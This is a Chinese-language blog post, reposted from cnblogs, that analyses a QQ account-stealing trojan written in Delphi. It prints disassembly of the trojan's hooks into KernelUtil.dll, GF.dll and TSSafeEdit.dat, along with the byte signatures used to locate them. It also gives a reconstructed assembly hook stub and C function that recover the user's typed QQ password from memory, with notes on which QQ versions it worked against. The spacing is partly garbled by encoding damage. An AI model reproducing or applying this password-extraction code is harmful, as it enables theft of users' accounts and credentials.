分析与提取QQ木马盗号技术
下面是測(cè)試的貼圖;
?
程序大致流程如下圖:
程序是用Delphi寫的,只有加載器加了個(gè)upx殼,其他的都沒有加殼;
所以分析起來就比較簡(jiǎn)單了;
這個(gè)程序的關(guān)鍵技術(shù)都在ntshruis2.dll這個(gè)模塊中了;
主要是hook了?4?個(gè)QQ進(jìn)程中4個(gè)關(guān)鍵的地方;
1.
CODE:0040F9A5?????????????????push????offset?a?isvalidaccoun?;?"?IsValidAccount@Misc@Util@@YAHVCTXStrin"...
CODE:0040F9AA?????????????????push????offset?aKernelutil_d_0?;?"KernelUtil.dll"
CODE:0040F9AF?????????????????call????GetModuleHandleA_0
CODE:0040F9B4?????????????????push????eax?????????????;?hModule
CODE:0040F9B5?????????????????call????GetProcAddress_0
CODE:0040F9BA?????????????????push????0Fh?????????????;?int
CODE:0040F9BC?????????????????push????20h?????????????;?int
CODE:0040F9BE?????????????????push????offset?unk_413A10?;?int
CODE:0040F9C3?????????????????push????offset?sub_40D11C?;?int
CODE:0040F9C8?????????????????push????ebx?????????????;?nSize
CODE:0040F9C9?????????????????push????eax?????????????;?lpBaseAddress
CODE:0040F9CA?????????????????call????sub_406E28??????;?hook?
hook?"KernelUtil.dll"模塊中的?"?IsValidAccount@Misc@Util@@YAHVCTXStrin"導(dǎo)出函數(shù)?主要是為了獲取QQ號(hào);
2.
CODE:0040F9CF?????????????????push????offset?a?getaccountnam?;?"?GetAccountName@Account@Util@@YA?AVCTXS"...
CODE:0040F9D4?????????????????push????offset?aKernelutil_d_0?;?"KernelUtil.dll"
CODE:0040F9D9?????????????????call????GetModuleHandleA_0
CODE:0040F9DE?????????????????push????eax?????????????;?hModule
CODE:0040F9DF?????????????????call????GetProcAddress_0
CODE:0040F9E4?????????????????push????0Fh?????????????;?int
CODE:0040F9E6?????????????????push????20h?????????????;?int
CODE:0040F9E8?????????????????push????offset?unk_413A34?;?int
CODE:0040F9ED?????????????????push????offset?sub_40F51C?;?int
CODE:0040F9F2?????????????????push????ebx?????????????;?nSize
CODE:0040F9F3?????????????????push????eax?????????????;?lpBaseAddress
CODE:0040F9F4?????????????????call????sub_406E28????
hook?"KernelUtil.dll"?模塊中的?"?GetAccountName@Account@Util@@YA?AVCTXS"?這個(gè)主要這個(gè)木馬的后序中會(huì)
給指定帳號(hào)充入Q幣3.CODE:0040F9F9?????????????????push????5
CODE:0040F9FB?????????????????push????228390h
CODE:0040FA00?????????????????push????0
CODE:0040FA02?????????????????mov?????edx,?offset?unk_4117C0
CODE:0040FA07?????????????????mov?????ecx,?21h
CODE:0040FA0C?????????????????mov?????eax,?offset?_str_GF_DLL.Text?;GF.dll
CODE:0040FA11?????????????????call????sub_4069CC???????//查找GF.dll中的特征碼返回要hook的地址;
CODE:0040FA16?????????????????push????0Fh?????????????;?int
CODE:0040FA18?????????????????push????20h?????????????;?int
CODE:0040FA1A?????????????????push????offset?unk_413A88?;?int
CODE:0040FA1F?????????????????push????offset?sub_40F66C?;?int
CODE:0040FA24?????????????????push????5???????????????;?nSize
CODE:0040FA26?????????????????push????eax?????????????;?lpBaseAddress
CODE:0040FA27?????????????????call????sub_406E28
hook?"GF.dll"?模塊中的??特征碼為?68?00?00?00?00?E8?00?處的地址?;
主要是為了獲取用戶按了什么按鍵??比如登錄按鈕;
4.
這個(gè)也是最關(guān)鍵的地方,是獲取QQ密碼的地方
CODE:0040FB08?????????????????push????1
CODE:0040FB0A?????????????????push????186A0h
CODE:0040FB0F?????????????????push????0
CODE:0040FB11?????????????????mov?????edx,?offset?unk_4117B8??;特征碼1:88?5D?0F?83?7E?04?
CODE:0040FB16?????????????????mov?????ecx,?6
CODE:0040FB1B?????????????????mov?????eax,?offset?_str_TSSafeEdit_dat_0.Text
CODE:0040FB20?????????????????call????sub_4069CC
CODE:0040FB25?????????????????mov?????esi,?eax
CODE:0040FB27?????????????????push????0Fh?????????????;?int
CODE:0040FB29?????????????????push????20h?????????????;?int
CODE:0040FB2B?????????????????push????offset?unk_413AAC?;?int
CODE:0040FB30?????????????????push????offset?sub_40F814?;?int
CODE:0040FB35?????????????????push????7???????????????;?nSize
CODE:0040FB37?????????????????push????esi?????????????;?lpBaseAddress
CODE:0040FB38?????????????????call????sub_406E28
CODE:0040FB3D?????????????????jmp?????short?loc_40FB74
CODE:0040FB3F?;?---------------------------------------------------------------------------
CODE:0040FB3F
CODE:0040FB3F?loc_40FB3F:?????????????????????????????;?CODE?XREF:?sub_40F910+1F6j
CODE:0040FB3F?????????????????push????1
CODE:0040FB41?????????????????push????186A0h
CODE:0040FB46?????????????????push????0
CODE:0040FB48?????????????????mov?????edx,?offset?unk_4117B0???;特征碼2:8B?5B?04?03?5D?10???(我機(jī)器上自己測(cè)試都用這段特征碼?2012,2013?beat3版本的)
CODE:0040FB4D?????????????????mov?????ecx,?5
CODE:0040FB52?????????????????mov?????eax,?offset?_str_TSSafeEdit_dat_0.Text;?TSSafeEdit.dat
CODE:0040FB57?????????????????call????sub_4069CC
CODE:0040FB5C?????????????????mov?????esi,?eax
CODE:0040FB5E?????????????????push????0Fh?????????????;?int
CODE:0040FB60?????????????????push????20h?????????????;?int
CODE:0040FB62?????????????????push????offset?unk_413AAC?;?int
CODE:0040FB67?????????????????push????offset?sub_40F7EC?;?int
CODE:0040FB6C?????????????????push????6???????????????;?nSize
CODE:0040FB6E?????????????????push????esi?????????????;?lpBaseAddress
CODE:0040FB6F?????????????????call????sub_406E28?????;hook?函數(shù)
hook?"TSSafeEdit.dat"?中特征碼有?兩處?,只要hook其中的一處?就可以?具體是怎么判斷要hook哪處的這個(gè)我還沒看出來;
這里我們就著重分析下是獲取密碼的算法;
這里是hook?"TSSafeEdit.dat"?中的地址之后?跳到?我們自己的函數(shù)中;
CODE:0040F7EC?sub_40F7EC??????proc?near???????????????;?DATA?XREF:?sub_40F910+257o
CODE:0040F7EC?????????????????pusha
CODE:0040F7ED?????????????????mov?????eax,?[esi+0C0h]
CODE:0040F7F3?????????????????add?????eax,?2
CODE:0040F7F6?????????????????push????eax
CODE:0040F7F7?????????????????push????dword?ptr?[ecx+48h]
CODE:0040F7FA?????????????????push????dword?ptr?[ecx+40h]
CODE:0040F7FD?????????????????push????dword?ptr?[ecx+8]
CODE:0040F800?????????????????push????dword?ptr?[ecx+14h]
CODE:0040F803?????????????????push????dword?ptr?[ecx+4]
CODE:0040F806?????????????????call????sub_40F6A4
CODE:0040F80B?????????????????popa
CODE:0040F80C?????????????????jmp?????ds:off_4117A4
CODE:0040F80C?sub_40F7EC??????endp
翻譯下
??__asm
??{
????pushad
????mov?eax,?[esi+0xC0];
????add?eax,?2;
????push?eax;????????????????????//密鑰key2
????push?dword?ptr?[ecx+0x48];???//這個(gè)不清楚?0x0D?不固定的
????push?dword?ptr?[ecx+0x40];???//密碼長(zhǎng)度
????push?dword?ptr?[ecx+0x08];???//待解密的字符串的長(zhǎng)度
????push?dword?ptr?[ecx+0x14];???//猜測(cè)是密鑰key1
????push?dword?ptr?[ecx+0x04];???//待解密的字符串
????call?GetPassword;
????popad
????jmp?gHookPasswordJmp
??}
call?sub_40F6A4??這個(gè)函數(shù)比較長(zhǎng),?所以就
所以我就貼下我寫好的?這段解密代碼;
void?__stdcall?GetPassword(char?*szBuf,?char?*szkey1,?int?nLen,?int?nPwdLen,?int?nbyte,?char*?szKey2)
{
??int?n1;
??int?n2;
??int?n3;
??int?n4;
??int?n5;
??char?szPwd[50]?=?{0};
??if?(!bFrist)
??{
????bFrist?=?TRUE;
????if?(nPwdLen?>?0)
????{
??????n1?=?1;
??????do?
??????{
????????n2?=?n1?*?nbyte?-?1;
????????if?(*(szkey1?+?n2))
????????{
??????????n3?=?*(szBuf?+?n2);
??????????if?(n3?<=?0x60?||?n3?>=?0x7B)
??????????{
????????????n4?=?0;
??????????}
??????????else
??????????{
????????????n3?-=?0x20;
????????????n4?=?1;
??????????}
??????????n5?=?0;
??????????while?(?n3?!=?*(szKey2?+?n5)?)
??????????{
????????????++n5;
????????????if?(?n5?==?0x81?)
??????????????goto?LABEL_16;
??????????}
??????????char?szTmp[2]?=?{0};
??????????if?(n4?==?1)
??????????{
????????????sprintf_s(szTmp,?"%c",?n5+32);
??????????}
??????????else
??????????{
????????????sprintf_s(szTmp,?"%c",?n5);
??????????}
??????????int?nSize?=?strlen(szPwd);
??????????strcpy(szPwd?+?nSize,?szTmp);
????????}
????????else
????????{
??????????char?szTmp[2]?=?{0};
??????????sprintf_s(szTmp,?"%c",?*(szBuf?+?n2));
??????????int?nSize?=?strlen(szPwd);
??????????strcpy(szPwd?+?nSize,?szTmp);
????????}
????LABEL_16:
????????++n1;
??????}?while?(nPwdLen--?!=?1);
????}
????OutputDebugStringA(szPwd);
??}
??
}
源碼就不放出來了,到這里?,關(guān)鍵的一些技術(shù)差不多就這樣了,這個(gè)木馬源碼還有為指定用戶充Q幣;
都在?hook?"KernelUtil.dll"?模塊中的?"?GetAccountName@Account@Util@@YA?AVCTXS"?中操作,有興趣的可以看看;
測(cè)試最近的QQ版本;
2012?版的win7?xp?下測(cè)試通過;
2013beat3?版的xp?測(cè)試通過;win7?的會(huì)崩潰;
2013正式版的測(cè)試了用不了;
不過據(jù)說已經(jīng)有牛人寫出了R0和R3驅(qū)動(dòng)結(jié)合的Hook,可以突破2013正式版。不過現(xiàn)在沒工夫去研究那些名名堂了。
轉(zhuǎn)載于:https://www.cnblogs.com/nickli666/articles/3467379.html
總結(jié)
以上是生活随笔為你收集整理的分析与提取QQ木马盗号技术的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: mysql 共享_Mysql局域网共享
- 下一篇: maven手册(转)